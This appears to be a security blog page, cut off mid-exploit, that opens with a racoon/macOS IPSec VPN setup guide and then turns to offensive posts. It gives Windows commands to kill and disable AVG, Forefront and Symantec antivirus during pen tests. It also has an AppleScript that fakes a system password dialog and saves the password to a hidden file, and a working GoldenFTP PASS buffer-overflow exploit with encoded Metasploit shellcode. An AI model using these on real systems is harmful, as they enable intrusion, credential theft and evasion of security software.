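# 16 characters.  Prints the number of valid entries; returns non-zero on
# any problem or when the file holds no entries at all.
check_psk_file() {
    file="$1"
    [ -f "$file" ] || { echo "missing: $file" >&2; return 1; }
    # columns 5-10 of "ls -l" are the group and other permission bits
    bits=$(ls -l "$file" | cut -c5-10)
    if [ "$bits" != "------" ]; then
        echo "insecure mode on $file (group/other bits: $bits)" >&2
        return 1
    fi
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # comments and blanks
        NF != 2 {
            bad++; printf "line %d: expected <identifier> <key>\n", NR > "/dev/stderr"; next
        }
        length($2) < 16 {
            bad++; printf "line %d: key shorter than 16 characters\n", NR > "/dev/stderr"; next
        }
        { ok++ }
        END { print ok + 0; exit (bad > 0 || ok == 0) }
    ' "$file"
}

# Usage on the router: PSK_FILE=/etc/racoon/psk.txt sh psk_setup.sh run
if [ "${1:-}" = "run" ]; then
    key=$(gen_psk)
    write_psk_file "$PSK_FILE" "$key"
    entries=$(check_psk_file "$PSK_FILE")
    echo "$PSK_FILE: $entries entry(ies), mode 0600"
fi
```

Running the check again after any hand edit to psk.txt catches the two mistakes racoon itself only reports at startup: a loosened file mode and a line that is not exactly identifier plus key.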
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<span style="font-family: Times, Times New Roman, serif;"><br /></span>
<br />
<h3>
<span style="font-family: Times, Times New Roman, serif;">MAC-OSX Mountain Lion: Cisco IPSEC VPN Client</span></h3>
To set up your MAC-OSX IPSEC client, you need to open Network
Preferences, click on the “Lock” to make changes, and then click on the small
“+” at the bottom left of the dialog to ADD a new interface. <br />
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3rGuuExMlhz9nHtAoVfp_-R6UJb9ctkFlxzkTc8EE8sjUZWWc4AvVRjRTall71fR6LEuB2-P0-mM2jwTP8_VDAcrWT_07a5TE1LV81G9nAPAoq4g0UzNqsgmhvonFap6CFpa2Mbk-5Y0/s1600/Screen+Shot+2012-12-31+at+11.37.20+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="151" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3rGuuExMlhz9nHtAoVfp_-R6UJb9ctkFlxzkTc8EE8sjUZWWc4AvVRjRTall71fR6LEuB2-P0-mM2jwTP8_VDAcrWT_07a5TE1LV81G9nAPAoq4g0UzNqsgmhvonFap6CFpa2Mbk-5Y0/s320/Screen+Shot+2012-12-31+at+11.37.20+PM.png" width="320" /></a></div>
<br />
<br />
<div class="MsoNormal">
<br />
<br />
<br />
Set the interface type to “VPN”, and VPN Type to “Cisco IPSec”, and then type in a descriptive service name.</div>
<div class="MsoNormal">
<br />
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinV54wvigeRKAHOSsnoOVMTTdj_bwblIOQD4zYLfUVitUqqvBaIHox3P2lpKGGH0IMEmsnRj0yaSl3f644ZS9kwzwy9PVvfc8ZWOuDVprTVdX3aJKeAY6QVa5JCMQ781aQd8u_HNYP3V0/s1600/Screen+Shot+2012-12-31+at+11.40.23+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinV54wvigeRKAHOSsnoOVMTTdj_bwblIOQD4zYLfUVitUqqvBaIHox3P2lpKGGH0IMEmsnRj0yaSl3f644ZS9kwzwy9PVvfc8ZWOuDVprTVdX3aJKeAY6QVa5JCMQ781aQd8u_HNYP3V0/s320/Screen+Shot+2012-12-31+at+11.40.23+PM.png" width="320" /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwHERczS3KOIk-sFOgwFgm23XZFftoCbtvSfnLdv285nfYV62q1qjgaHNdoJDf4HOdKz_wXGYndCQtvcoQSQkfs90ZRW3IoBUVLDdWwJ0FrZNdu7YirqIOMi2O68z4yjLzVh-bW7zol0/s1600/Screen+Shot+2012-12-31+at+11.39.31+PM.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwHERczS3KOIk-sFOgwFgm23XZFftoCbtvSfnLdv285nfYV62q1qjgaHNdoJDf4HOdKz_wXGYndCQtvcoQSQkfs90ZRW3IoBUVLDdWwJ0FrZNdu7YirqIOMi2O68z4yjLzVh-bW7zol0/s320/Screen+Shot+2012-12-31+at+11.39.31+PM.png" width="320" /></a><br />
<div class="MsoNormal" style="clear: both;">
Click on your new IPSEC VPN connection, and enter the appropriate address or domain name of your remote server, as well as the UNIX/Linux username that you will use to connect.</div>
</div>
Next, click on the “Authentication Settings” button and set the “Shared Secret” to the same long random string you used for the pre-shared key on the server. Leave the “Group Name” blank, and click OK.<br />
<br />
<h3>
Testing The Configuration</h3>
<div>
If you use the "strict_address" configuration in the "listen" section of the racoon configuration, you can only test from outside your home network. However, if we assume that your home Linux router gateway also has a second interface for "internal" network traffic, the entire listen section of the racoon.conf file can be commented out during testing to make racoon listen on all interfaces as follows.</div>
<div>
<br /></div>
<div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#listen {</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># adminsock disabled; #do not listen on the admin socket</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># isakmp 240.9.9.9 [500]; #address for ISAKMP</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># isakmp_natt 240.9.9.9 [4500]; #address for ISAKMP NAT-Traversal</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"># strict_address; #strictly bind these addresses</span></span></div>
<div class="MsoNormal">
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;">#}</span></span><br />
<span style="font-size: 10pt;"><span style="font-family: Courier New, Courier, monospace;"><br /></span></span>
For testing purposes, you should use either a console on your Linux server, or ssh in from another machine, and then run racoon in debugging mode from the command line as root.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"># service racoon stop</span><br />
<span style="font-family: Courier New, Courier, monospace;"># /usr/sbin/racoon -F -d</span><br />
<br />
The "-F" flag instructs racoon to log all output to stdout/screen. The more "-d" flags you add to the command line, the more debugging output you should receive. After starting racoon on the command line, you should attempt to connect from your MAC-OSX system.<br />
<br />
Assuming that your group pre-shared key matches, if you get through IPSEC key management negotiation phase 1, your MAC-OSX system should prompt you for a username and password. This username has to be a UNIX/Linux based username that has been added to the server system. If successful, you should see your "banner" message of the day displayed, and receive a VPN pool IP address in the 10.222.1.0/24 network. You can then put racoon back into normal running mode, and you have successfully configured a remote access VPN.<br />
<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"># /usr/sbin/racoon -F -d</span><br />
<div>
<span style="font-family: Courier New, Courier, monospace;"># CTRL-c</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"># service racoon start</span></div>
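As an added example (not from the post or the racoon project), the Python below parses the listen block of a racoon.conf and reports which addresses racoon will bind for IKE, so you can tell in advance whether a test from the inside segment can reach it; the config text is taken from the block above and the 192.168.1.1 inside-gateway address is a constructed placeholder.

```python
"""Report how racoon will bind its IKE sockets from a racoon.conf listen block.

Added example, not part of the original post. parse_listen() strips the '#'
comments, pulls out the active listen { } block (if any) and returns the bound
isakmp / isakmp_natt addresses plus the strict_address and adminsock settings.
With no active isakmp address, racoon listens on every interface, which is why
commenting the block out lets you test from the inside.
"""
import re

# Constructed: the listen block from the post, active.
ACTIVE_LISTEN = """
listen {
    adminsock disabled;              #do not listen on the admin socket
    isakmp 240.9.9.9 [500];          #address for ISAKMP
    isakmp_natt 240.9.9.9 [4500];    #address for ISAKMP NAT-Traversal
    strict_address;                  #strictly bind these addresses
}
"""

# Constructed: the same block fully commented out for testing, as the post suggests.
COMMENTED_LISTEN = "\n".join("#" + line for line in ACTIVE_LISTEN.strip().splitlines())


def strip_comments(text):
    """Drop '#' to end-of-line comments, the comment syntax racoon.conf uses."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())


def parse_listen(conf):
    """Return the effective listen settings of a racoon.conf text.

    'isakmp' and 'isakmp_natt' are lists of (address, port) tuples,
    'strict_address' is a bool and 'adminsock' is its raw argument (or None).
    A missing or fully commented block yields the defaults, i.e. bind all interfaces.
    """
    result = {"isakmp": [], "isakmp_natt": [], "strict_address": False, "adminsock": None}
    block = re.search(r"\blisten\s*\{(.*?)\}", strip_comments(conf), re.S)
    if block is None:
        return result
    for statement in block.group(1).split(";"):
        tokens = statement.split()
        if not tokens:
            continue
        key = tokens[0]
        if key == "strict_address":
            result["strict_address"] = True
        elif key in ("isakmp", "isakmp_natt"):
            # Syntax: isakmp <address> [port];  the port defaults to 500 / 4500.
            port = 500 if key == "isakmp" else 4500
            if len(tokens) > 2:
                port = int(tokens[2].strip("[]"))
            result[key].append((tokens[1], port))
        elif key == "adminsock":
            result["adminsock"] = " ".join(tokens[1:])
    return result


def ike_reachable_via(conf, local_addr):
    """True if a peer talking to local_addr reaches racoon's IKE (UDP/500) socket."""
    bound = parse_listen(conf)["isakmp"]
    if not bound:
        return True  # no address given: racoon binds every interface
    return any(addr == local_addr for addr, _ in bound)


if __name__ == "__main__":
    print(parse_listen(ACTIVE_LISTEN))
    # 192.168.1.1 is a constructed address for the router's inside interface.
    print("inside test with strict listen:", ike_reachable_via(ACTIVE_LISTEN, "192.168.1.1"))
    print("inside test, block commented out:", ike_reachable_via(COMMENTED_LISTEN, "192.168.1.1"))
```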
<div>
<br />
<br /></div>
Good luck, and please post comments/questions on your experience.<br />
<br />
<br /></div>
</div>
<h3>Disabling AntiVirus when Pen Testing</h3>
2011-12-05<br />
<br />
When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have become quite adept with signatures that match the assembly stub routines used to inject malware into a system. The A/V guys will also pick up on common service executable files such as those used with Metasploit’s bypassuac. Let’s face it, we still need to write stuff into temp directories from time to time.<br />
<br />
Mark Baggett and Tim Tomes recently presented some nice techniques on hiding malware within Windows volume shadow copies (<a href="http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows">http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows</a>). Since it is unlikely for A/V products to be able to scan volume shadow copies, and the capability to create a process from a volume shadow copy using ‘wmic’ exists, we would likely want to follow this sequence of tasks during a test:<br />
<br />
a) Disable the A/V product of choice.<br />
b) Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar)<br />
c) Upload Mark and Tim’s excellent vssown.vbs script<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>a. Enable service and create volume shadow copy.<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>b. Disable volume shadow copy service.<br />
d) Delete our favorite/useful executable content and modified timestamps accordingly assuming we want to be somewhat stealthy.<br />
e) Execute our content from the volume shadow copy using ‘wmic’ using the excellent vssown script, or just through ‘wmic process call create’.<br />
<br />
The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective. In other words, Windows Security Center and the A/V tray executable files themselves will try to inform the user that something is broken when we proceed with these recipes.<br />
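Since none of these recipes are quiet, the defender's counterpart is a host check that looks for exactly the symptoms they leave behind. The Python below is an added example, not code from the post: it takes a snapshot of running service names and the file names in the AV install directory and flags stopped services, missing binaries and renamed copies, using the service and process names this post lists for the three products; the snapshots are constructed.

```python
"""Flag the host-side symptoms left behind by the AV-disabling recipes in this post.

Added example, not code from the post. assess() compares a snapshot of a Windows
host (running service names plus the file names in the AV install directory)
against the service and binary names the post lists per product, and reports
stopped services, missing binaries and renamed copies such as avgcsrva_.exe.
The snapshots are constructed; on a real host they would come from an agent
running 'sc query' / 'wmic service' and listing the install directory.
"""
import re

# Service and process names exactly as listed in the post, per product.
AV_PRODUCTS = {
    "AVG 2012": {
        "services": ["avgwd", "avgidsagent"],
        "binaries": ["avgidsagent.exe", "avgwdsvc.exe", "avgemca.exe",
                     "avgrsa.exe", "avgcsrva.exe", "avgnsa.exe"],
    },
    "Microsoft Forefront": {
        "services": ["msmpsvc"],
        "binaries": ["msmpeng.exe", "msseces.exe"],
    },
    "Symantec Endpoint Protection": {
        "services": ["ccEvtMgr", "ccSetMgr", "smcservice", "Symantec AntiVirus"],
        "binaries": ["smcgui.exe"],
    },
}


def assess(product, running_services, install_dir_files):
    """Return a list of finding strings for one product (empty list = healthy)."""
    spec = AV_PRODUCTS[product]
    running = {s.lower() for s in running_services}
    present = {f.lower() for f in install_dir_files}
    findings = []
    for svc in spec["services"]:
        if svc.lower() not in running:
            findings.append(f"service not running: {svc}")
    for exe in spec["binaries"]:
        exe = exe.lower()
        if exe not in present:
            findings.append(f"binary missing: {exe}")
        # A copy with a suffix inserted before .exe (e.g. avgcsrva_.exe) is the
        # rename pattern shown in the post; match stem + [_~-] + anything + .exe.
        stem = exe[: -len(".exe")]
        renamed = re.compile(re.escape(stem) + r"[_~-][^.]*\.exe$")
        for name in sorted(present):
            if name != exe and renamed.match(name):
                findings.append(f"renamed copy of {exe}: {name}")
    return findings


# Constructed snapshot of an AVG host after the rename-and-kill recipe:
# watchdog services still up, the four engine binaries renamed with a trailing '_'.
AVG_TAMPERED = {
    "services": ["avgwd", "avgidsagent", "Dhcp", "EventLog"],
    "files": ["avgidsagent.exe", "avgwdsvc.exe", "avgemca_.exe",
              "avgrsa_.exe", "avgcsrva_.exe", "avgnsa_.exe"],
}
# Constructed healthy AVG host.
AVG_HEALTHY = {
    "services": ["avgwd", "avgidsagent", "Dhcp", "EventLog"],
    "files": list(AV_PRODUCTS["AVG 2012"]["binaries"]),
}
# Constructed Forefront host after 'sc stop msmpsvc': binaries untouched, service down.
FOREFRONT_TAMPERED = {
    "services": ["Dhcp", "EventLog"],
    "files": ["msmpeng.exe", "msseces.exe"],
}


def demo():
    """Run the three constructed snapshots and return their findings by name."""
    return {
        "avg_tampered": assess("AVG 2012", AVG_TAMPERED["services"], AVG_TAMPERED["files"]),
        "avg_healthy": assess("AVG 2012", AVG_HEALTHY["services"], AVG_HEALTHY["files"]),
        "forefront_tampered": assess("Microsoft Forefront",
                                     FOREFRONT_TAMPERED["services"],
                                     FOREFRONT_TAMPERED["files"]),
    }


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or ["healthy"])
```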
<br />
<br />
1. Grisoft’s AVG<br />
<br />
Using the 2012 Freeware version, I note the following information about AVG. Services running are the AVG watchdog (avgwd), and the AVG IDS agent (avgidsagent). The running processes are as follows: avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things, is not killable, and neither is the service stoppable.<br />
<br />
DISABLING:<br />
a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> cd %systemroot%\program files\avg\avg2012</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgcsrva.exe avgcsrva_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgemca.exe avgemca_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgnsa.exe avgnsa_.exe</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> move avgrsa.exe avgrsa_.exe</b></span><br />
<br />
b. Kill the running processes simultaneously with a one line (wildcard powered) wmic command.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> wmic process where "name like 'avg[cenr]%.exe'" delete</b></span><br />
<br />
c. The watchdog service will try to restart all of the binaries but fail.<br />
<br />
ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.<br />
<br />
<br />
2. Microsoft Forefront<br />
<br />
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.<br />
<br />
DISABLING: kill the GUI tool and stop the A/V engine service.<br />
<br />
<b><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">C:\> wmic process where name="msseces.exe" delete</span></b><br />
<b><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">C:\> sc stop msmpsvc</span></b><br />
<br />
ENABLING: start the A/V service engine, and start the GUI process.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> cd \Program Files\Microsoft Security Client</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc start msmpsvc</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> msseces.exe</b></span><br />
<br />
<br />
3. Symantec Endpoint Protection<br />
<br />
The services running are ccEvtMgr, ccSetMgr, smcservice, and “Symantec AntiVirus”. The processes that matter are smb.exe, and smcgui.exe.<br />
<br />
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr), and settings manager (ccSetMgr) service can remain running without any impact.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> wmic process where "name like '%smc%.exe'" delete</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc stop smcservice</b></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc stop "Symantec AntiVirus"</b></span><br />
<br />
ENABLING: restarting just the smcservice will start everything else back up again.<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><b>C:\> sc start smcservice</b></span><br />
<h3>Fun with AppleScript</h3>
2011-10-25<br />
<br />
--<br />
-- Description: This script prompts the user to enter their password<br />
-- in order to perform a privileged function. The password<br />
-- is subsequently saved to a hidden file in their home directory.<br />
-- The "Cancel" button is the default on the dialog which<br />
-- will hopefully encourage the user to enter accurate info.<br />
--<br />
-- Author: Joff Thyer, October 2011<br />
--<br />
set filename to ((path to home folder) as string) & ".mpass"<br />
set myprompt to "Type your password to allow System Preferences to make changes"<br />
<br />
set ans to "Cancel"<br />
repeat<br />
try<br />
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "Cancel" with icon path to resource "LockedIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"<br />
set ans to button returned of d_returns<br />
set mypass to text returned of d_returns<br />
if ans = "OK" then exit repeat<br />
end try<br />
end repeat<br />
<br />
try<br />
set now to do shell script "date '+%Y%m%d_%H%M%S:'"<br />
set myfile to open for access filename with write permission<br />
set outstr to now & mypass & "<br />
"<br />
write outstr to myfile starting at eof<br />
close access myfile<br />
on error<br />
try<br />
close access myfile<br />
end try<br />
end try<br />
<h3>Using metasploit meterpreter scripts enum_firefox.rb and enum_chrome.rb</h3>
2011-07-15<br />
<br />
Two useful meterpreter scripts for enumerating client browser data are enum_firefox.rb and enum_chrome.rb, located in the framework scripts/meterpreter directory.<br />
<br />
It is important to understand that both of these scripts require sqlite3 be properly installed on your exploitation system. Assuming your exploitation system is Ubuntu Linux for a moment, you can ensure that sqlite3 dependencies are installed as follows:<br />
<br />
sudo apt-get install sqlite3<br />
sudo apt-get install libsqlite3-dev<br />
sudo gem install sqlite3-ruby<br />
<br />
Once this has completed, restart your msfconsole, exploit away, and run the appropriate browser enumeration scripts. Output from your enumeration will be stored in the msf config directory at the following paths.<br />
<br />
log/scripts/enum_firefox<br />
log/scripts/enum_chrome<br />
<br />
With a local installation under Ubuntu, the msf config directory is often $HOME/.msf<br />
<h3>Revised V2.5 Golden FTP 4.70 PASS overflow exploit</h3>
2011-07-08<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#!/usr/bin/python</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">###########################################################################</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Exploit Version: 2.5, 2011-07-08 15:00</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Date: July 8, 2011 (20110708-1500)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Author: Joff Thyer (jsthyer@gmail.com)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Software Link: http://www.goldenftpserver.com/</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Version: 4.70</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Tested on: WinXP-SP0/SP2/SP3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## CVE: 2006-6576</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">##</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## based on exploit by:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">##</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## NOTES:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## (1) You must make sure that the "Show new connections" option is enabled</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## in order for this exploit to work.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## (2) Specifying the IP source address is important as it is used in the</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">## calculation of the overflow buffer offset.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">###########################################################################</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import socket</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import sys</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">from subprocess import Popen, PIPE</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import re</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">import time</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># Metasploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 281 bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">calc = \</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x88"</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># Metasploit</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"># 422 bytes</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">cmdshell = \</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\</span><br />
